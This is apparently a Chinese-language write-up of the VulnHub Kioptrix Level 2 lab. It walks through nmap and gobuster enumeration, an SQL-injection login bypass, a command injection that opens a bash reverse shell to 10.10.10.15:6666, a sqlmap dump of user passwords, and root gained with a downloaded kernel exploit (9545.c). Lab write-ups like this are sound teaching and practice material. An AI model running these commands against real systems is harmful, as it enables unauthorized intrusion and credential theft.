总字符数: 9.32K

代码: 2.75K, 文本: 6.58K

预计阅读时间: 19 分钟

Overview| Name | Template |

| — | — |
| Release Date | 2024-02-26 |
| Write-up Author | kill3r |
| Machine Author | kill3r |
| Difficulty | Medium |
| User Flag | |
| Root Flag | |
| Link | https://www.vulnhub.com/entry/kioptrix-level-11-2,23/ |

相关技能1. File Upload

  1. Local File Include
  2. vim to shell

薄弱点1. 字典及信息收集技能薄弱

Nmap扫描```bash

使用nmap命令扫描本地主机的所有端口(从1到65535),–min-rate=1000参数表示每秒发送最少1000个包,-T4参数表示设置扫描速度为快速扫描模式。

grep -oE ‘(^[0-9][^/tcp]*)’用于提取输出结果中的端口号,tr ‘\n’ ‘,’用于将提取的端口号按逗号分隔并拼接成一个字符串

ports=$(nmap -p- –min-rate=1000 -T4 10.10.10.19 | grep -oE ‘(^[0-9][^/tcp]*)’ | tr ‘\n’ ‘,’)

使用nmap命令再次扫描指定的端口,-p$ports参数表示扫描之前提取的端口列表,-sV参数表示进行服务版本检测,-sC参数表示在扫描过程中使用默认脚本进行常见漏洞探测,-O参数表示进行操作系统版本检测,-oN nmap.txt参数表示将扫描结果保存到名为nmap.txt的文件中。

nmap -p$ports -sV -sC -O 10.10.10.19 -oN nmap.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
```bash
┌──(root㉿kill3r)-[/home/kill3r]
└─# ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.19 | grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ',')
┌──(root㉿kill3r)-[/home/kill3r]
└─# nmap -p$ports -sV -sC -O 10.10.10.19 -oN nmap.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2023-08-05 11:31 CST
Nmap scan report for 10.10.10.19
Host is up (0.00026s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 613/udp status
|_ 100024 1 616/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_RC2_128_CBC_WITH_MD5
|_http-server-header: Apache/2.0.52 (CentOS)
|_ssl-date: 2023-08-05T00:22:22+00:00; -3h09m22s from scanner time.
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
616/tcp open status 1 (RPC #100024)
631/tcp open ipp CUPS 1.1
| http-methods:
|_ Potentially risky methods: PUT
|_http-title: 403 Forbidden
|_http-server-header: CUPS/1.1
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:53:19:4C (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop
Host script results:
|_clock-skew: -3h09m22s
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.02 seconds

枚举### SMB 枚举> Port: 139 389 445 636

  • enum4linux -a/-A 127.0.0.1
1
$ enum4linux -A <ip>

Web> HTTP Web Server, Port Like: 80 443 81 8080 8443 4443 8081

  • Finger:获取有关特定用户或系统上的用户列表和配置信息

`whatweb````bash

用于识别和分析目标网站的技术栈、CMS(内容管理系统)、插件、框架和其他与网站相关的信息。通过分析网站的响应和页面内容

┌──(root㉿kill3r)-[~]
└─# whatweb 192.168.56.101
http://192.168.56.101 [200 OK] Apache[2.4.46], Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.46 (Debian)], IP[192.168.56.101], Script[text/javascript]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
- 目录枚举
`dirb http://192.168.56.101`
`dirsearch -u http://192.168.56.101 -r`
`gobuster dir -w ... -u http://192.168.56.101 -x html,php,js,bak`
```bash
┌──(root㉿kill3r)-[/]
└─# gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.10.9 -x html,php,js,bak
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.9
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: html,php,js,bak
[+] Timeout: 10s
===============================================================
2023/08/05 13:37:07 Starting gobuster in directory enumeration mode
===============================================================
Error: error on running gobuster: unable to connect to http://10.10.10.9/: Get "http://10.10.10.9/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
┌──(root㉿kill3r)-[/]
└─# gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.10.19 -x html,php,js,bak
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.19
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: js,bak,html,php
[+] Timeout: 10s
===============================================================
2023/08/05 13:37:56 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 284]
/index.php (Status: 200) [Size: 667]
/manual (Status: 301) [Size: 311] [--> http://10.10.10.19/manual/]
/usage (Status: 403) [Size: 284]
/.html (Status: 403) [Size: 284]
Progress: 1102282 / 1102805 (99.95%)===============================================================
2023/08/05 13:43:45 Finished
===============================================================
  • 漏洞扫描
1
2
$ nikto -h http://www.example.com/
$ nuclei -u https://example.com/

wordlist- cewl.list:

cewl http://192.168.56.101/ -w dict.txt

1
2
3
4
5
```
- pass.list
```plaintext
5afac8d85f
66lajGGbla
  • user.list
1
2
admin
john
  • hash.list
1
2
3
```
- information.list
```bash

复现过程### 访问靶场,寻找功能点

启动Burp进行后台突破:

  1. SQL注入
  2. 万能密码:
    admin' or '1'='1
  3. 访问凭证伪造
  4. 弱口令
  5. 返回包修改
    成功进入后台,但是我的框呢???
    Burp抓包把框弄出来
    一看就像典型的命令执行输入IP继续抓包
  • Kali nc监听:
    nc -lvvp 6666
  • bash -i >& /dev/tcp/10.10.10.15/6666 0>&1

漏洞分析- MySQL-unauthorized

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
┌──(root㉿kill3r)-[/]
└─# mysql -uroot -proot -h10.10.10.19
ERROR 1130 (HY000): Host 'kill3r.lan' is not allowed to connect to this MySQL server
- MySQL-InJect
```bash
┌──(root㉿kill3r)-[/opt]
└─# sqlmap -r sql_InJect.txt --level 5 --risk 3 --dbs
available databases [1]:
[*] webapp
┌──(root㉿kill3r)-[/opt]
└─# sqlmap -r sql_InJect.txt --level 5 --risk 3 -D "webapp" --tables --risk 3
Database: webapp
[1 table]
+-------+
| users |
+-------+
┌──(root㉿kill3r)-[/opt]
└─# sqlmap -r sql_InJect.txt --level 5 --risk 3 -D "webapp" -T "users" --columns
Database: webapp
Table: users
[3 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | numeric |
| password | non-numeric |
| username | non-numeric |
+----------+-------------+
┌──(root㉿kill3r)-[/opt]
└─# sqlmap -r sql_InJect.txt --level 5 --risk 3 -D "webapp" -T "users" -C "id,username,password" --dump
Database: webapp
Table: users
[2 entries]
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | admin | 5afac8d85f |
| 2 | john | 66lajGGbla |
+----+----------+------------+

提升权限- 搜索UID无果

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
bash-3.00$ find / -perm -u=s -type f 2>/dev/null
/sbin/unix_chkpwd
/sbin/pam_timestamp_check
/sbin/pwdb_chkpwd
/usr/sbin/ccreds_validate
/usr/sbin/userhelper
/usr/sbin/userisdnctl
/usr/sbin/suexec
/usr/sbin/usernetctl
/usr/libexec/openssh/ssh-keysign
/usr/libexec/pt_chown
/usr/kerberos/bin/ksu
/usr/lib/squid/pam_auth
/usr/lib/squid/ncsa_auth
/usr/bin/chsh
/usr/bin/rcp
/usr/bin/sudo
/usr/bin/chage
/usr/bin/crontab
/usr/bin/rlogin
/usr/bin/rsh
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/lppasswd
/usr/bin/sg
/usr/bin/passwd
/bin/mount
/bin/traceroute6
/bin/traceroute
/bin/umount
/bin/ping6
/bin/ping
/bin/su
  • Viewing Crontab
1
2
3
4
5
6
7
8
9
10
bash-3.00$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly
  • Viewing Core
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
bash-3.00$ cat /etc/*release*
cat: /etc/lsb-release.d: Is a directory
CentOS release 4.5 (Final)
bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
┌──(root㉿kill3r)-[/opt]
└─# searchsploit centos 2.6
---------------------------------------------------------------------------- --------------------------------- Exploit Title | Path
---------------------------------------------------------------------------- ---------------------------------Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / | linux/local/9545.c
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / Ce | linux/local/9479.c
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 | linux_x86/local/9542.c
Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Esca | linux/local/25444.c
Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mu | linux_x86-64/local/45516.c
---------------------------------------------------------------------------- ---------------------------------Shellcodes: No Results
Papers: No Results
bash-3.00$ lsb_release -a
lsb_release -a
LSB Version: :core-3.0-ia32:core-3.0-noarch:graphics-3.0-ia32:graphics-3.0-noarch
Distributor ID: CentOS
Description: CentOS release 4.5 (Final)
Release: 4.5
Codename: Final
  • Vuln Exp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(root㉿kill3r)-[/opt]
└─# searchsploit -m 9545.c
┌──(root㉿kill3r)-[/opt/vulnhub]
└─# python3 -m http.server 8888
bash-3.00$ cd /tmp
bash-3.00$ wget http://10.10.10.15:8888/9545.c
--21:49:13-- http://10.10.10.15:8888/9545.c
=> `25444.c'
Connecting to 10.10.10.15:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9,408 (9.2K) [text/x-csrc]
0K ......... 100% 1.25 GB/s
21:51:48 (1.25 GB/s) - `9545.c' saved [9408/9408]
bash-3.00$ gcc 9545.c
9545.c:376:28: warning: no newline at end of file
bash-3.00$ ./a.out
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)

Shell as user1

Shell as user2## 以root身份进入Shell> 保存屏幕截图作为Flag或Proof

许可协议

本文由 kill3r 原创,采用 署名-非商业性使用-相同方式共享 4.0 国际 许可协议,转载请注明出处。

分享文章

快来参与讨论吧~